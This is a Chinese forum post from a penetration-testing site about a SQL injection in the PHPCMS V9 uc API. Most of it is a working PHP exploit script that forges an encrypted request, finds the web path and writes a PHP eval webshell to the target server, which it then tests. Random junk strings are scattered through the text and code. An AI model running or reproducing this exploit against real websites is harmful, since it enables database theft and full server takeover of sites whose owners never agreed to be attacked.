中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
. _+ f; l; d- k
* F& Z1 I& w4 K) V3 P' I3 K+ k所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。
6 j8 M3 V7 z7 o2 v' H
漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
    public function deleteuser($get,$post) {
& U6 {2 t  A" T4 X6 o! U        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
, u7 i. i) }# v2 ^' x/ Q# W        $ids = new_stripslashes($get['ids']);
. R1 [+ S5 [+ ^2 R" {        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
% Z, D9 l$ `* D2 q' _+ U+ n
利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
print_r('
---------------------------------------------------------------------------
* c- j4 w& t2 ~0 c2 n' GPHPcms (v9 or Old Version) uc api sql injection 0day
8 t5 z+ Z1 W+ Iby rayh4c#80sec.com
---------------------------------------------------------------------------
+ r2 N" [" N+ M% s$ z2 X  t: p! b');
1 X$ {$ b2 U4 d" F) c+ _$ k6 J( w
if ($argc<3) {
9 }) [; ~1 }1 M! V' A0 m$ m    print_r('
+ D$ d- e( S  r---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
4 a1 G# w6 Y. @4 P4 ipath:      path to phpcms
  \) K" |# J: e1 cOptions:
& N0 M6 q- V8 r1 u7 [$ v -p[port]:    specify a port other than 80
" s( A- A$ x6 p2 }4 K -P[ip:port]: specify a proxy
Example:
) ^. P! e2 |5 k$ P3 s( [" c& i# C6 Hphp '.$argv[0].' localhost /
0 j5 ]% Y: x+ d. G' W. cphp '.$argv[0].' localhost /phpcms/ -p81
5 s* K- I! d# T$ u* l+ C$ b3 J5 Aphp '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
---------------------------------------------------------------------------
');
& \) r, o* h9 ?    die;
4 {4 c+ g7 c  x3 d2 Q- ?+ v: v/ o3 g9 V}

/ X! b0 I3 V" p. c; Q, e8 w7 J- M2 Perror_reporting(7);
- Y) N) d9 R8 ?/ U1 n+ Tini_set("max_execution_time",0);
. B+ i; J1 c; M: cini_set("default_socket_timeout",5);
2 G6 N8 k& h4 f$ ^
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
. U9 \9 S' i; [* i1 T  {
9 T0 P3 P+ b' k( `  V1 d0 [   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
5 o$ c/ W+ r/ i! T% E3 j' ~5 \. @4 m   {$result.="  .";}
   else
' s8 B9 n) ]" Y/ @+ l   {$result.="  ".$string[$i];}
# [8 H# U" S: t3 E% \) n  E* g   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
1 h2 a) f4 `$ r1 Q$ o# y  }
return $exa."\r\n".$result;
}
: N, z# I( y0 X. y  W. Z" v% M$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

  o3 M4 I4 K# E! L0 vfunction send($packet)
{
9 H  c$ ~- D- o5 d7 i4 s  global $proxy, $host, $port, $html, $proxy_regex;
/ v& Z1 _  F' W3 _# z  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
7 |$ [- L7 S! @, P    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
* g# `# }! }" g+ Z- r% p" P  }
  else {
        $c = preg_match($proxy_regex,$proxy);
. ?7 T# h( c& }- k    if (!$c) {
8 |$ h/ [: A7 O8 e      echo 'Not a valid proxy...';die;
! I7 [2 {  Z1 T$ Q/ H    }
0 d( j; f1 `% \    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
) |+ l. Y6 K, m3 ~( D7 }' h9 n0 ^    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
) _0 s+ Y9 [. [) W* R, w  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
3 k+ K7 Y; B6 A7 V4 a8 v    }
  }
  else {
    $html='';
8 _) N1 i" a# h  }3 A9 w    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
+ L( F5 v! \( E% a1 a% a+ F    }
  }
7 ~; B3 w) I: D1 T: A$ f, B3 c  fclose($ock);
( N6 g! e3 \, ]; {1 ?}
- v. P, D* A# B/ p1 j% i. y) @1 c
$host=$argv[1];
$path=$argv[2];
$port=80;
9 c$ F4 V! P* m# L/ i$ `$proxy="";
! k& [0 @1 l5 {" X; e: u8 Z5 @( Xfor ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
; J( w( [  m5 J, i3 Hif ($temp=="-p")
9 O7 {  Z+ D5 w8 X, [5 O/ e3 J2 G{
2 r/ Q. \3 H7 m1 [' q  $port=(int)str_replace("-p","",$argv[$i]);
8 M, R( l5 [3 C}
: K! Q& ]8 M. G' r3 c+ V4 H- Bif ($temp=="-P")
5 U$ i) ^' {: X  I% s) n5 a{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
, x  U% |0 Z, r. z% ]  [, m. w
2 S$ `1 f8 r9 j& lif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  J& i0 s: k0 @; N+ C, B, qif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
% w( O, i1 F8 f2 U) b
" M! i0 K7 L! M    $ckey_length = 4;

    $key = md5($key ? $key : '');
* c' ?3 g9 _- o& q, s( \/ m- y    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

, b- g0 K3 @" j3 K$ S# u1 n* v    $cryptkey = $keya.md5($keya.$keyc);
1 U" f  j) B9 t& u" x& Q% A    $key_length = strlen($cryptkey);

' t8 n! _/ b0 u7 \    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
/ r/ R; u) {1 N0 V1 k    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);
/ x2 h. b- j/ [! ?+ o. @
' ]9 W/ i0 K. |! D$ Z    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
7 Q$ J, n1 f9 U  G* r: f    }

4 }, e; ~  I5 b0 s    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
8 b# G7 V: i# |2 W7 H2 X        $box[$i] = $box[$j];
! o2 n0 R! e8 A* c( \        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
  {8 b( m7 m+ A! C        $box[$a] = $box[$j];
( m+ N4 D- c) y. \        $box[$j] = $tmp;
+ P; J' y) o2 F; a& [; c        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
8 Y" O7 \# X1 H1 ~' e    }

9 |/ B# T3 `& g" }    if($operation == 'DECODE') {
* t+ Y( h" t& M0 ?7 ?6 H7 z( N        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
4 G/ f- f; `5 l4 [6 H/ E6 ~  f9 D1 q            return substr($result, 26);
. J, c4 t# f* k& g8 p! z2 L        } else {
            return '';
( t- M: x, B" @9 M; l1 v, ~        }
    } else {
' o  R* ?2 Q4 l, |' c& ?: D- b7 k$ |        return $keyc.str_replace('=', '', base64_encode($result));
    }
$ }# v/ q) }8 N
/ c+ }) o, o: J}
8 {9 K' y% G, b
5 ?7 F) w2 ^- {2 g, |1 a$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"MySQL Errno") > 0){
* W  g" o& W' i- ]2 recho "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
. P# v6 u# V1 R) s$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
1 h# S2 k$ \. G1 B& P$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
. p2 ]9 p" j) R9 [7 L. ^; xsend($packet);
, R% ^- e# j  Q  g( J: jpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
4 D. ~# J3 J3 Y# k1 sif(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
5 h0 m% d; `: _$ |$SQL = "time=999999999999999999999999&ids=1)";
5 D& m6 n2 ]7 Y9 v6 Q3 S$ p' q) U8 n$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
4 D2 A4 h9 f3 [: G$SQL.="&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
3 o- K4 T1 l4 h" d+ c+ v' U$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
, v; @; m( \" z* w) [! I; K$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
# L0 ^  I5 j$ o  w1 G$packet.="Connection: Close\r\n\r\n";
; {; P: V1 |, W" h1 d0 Hsend($packet);
if(strpos($html,"Access denied") > 0){
echo "[-] MYSQL权限过低 禁止写入文件 ";
/ B# f, J; a" s1 `die;
2 O' K& Z/ C: @. ^, e}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
3 i2 D; W: J$ w1 p( o( @$packet.="User-Agent: Mozilla/5.0\r\n";
7 [$ L2 i  y& y" y7 j7 c' k$packet.="Host: ".$host."\r\n";
: s. j. U4 c% {! v& p$packet.="Connection: Close\r\n\r\n";
! H) L- L! a+ Qsend($packet);
if(strpos($html,"<title>phpinfo()</title>") > 0){
" z1 e& U& |5 q3 D. Techo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
& N9 \- P- V9 k8 l4 D4 u; u}
}else{
echo "[-]未取到web路径 ";
6 F8 k* o5 c5 @}
}else{
9 @0 ~. W$ b9 _- v# Yecho "[*]不存在SQL注入漏洞"."\n";
5 i2 I+ L* k; G  m' C6 _" S}

# e: Z. O- P) H?>
! F1 \* |5 q4 t, u2 c: T: c

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2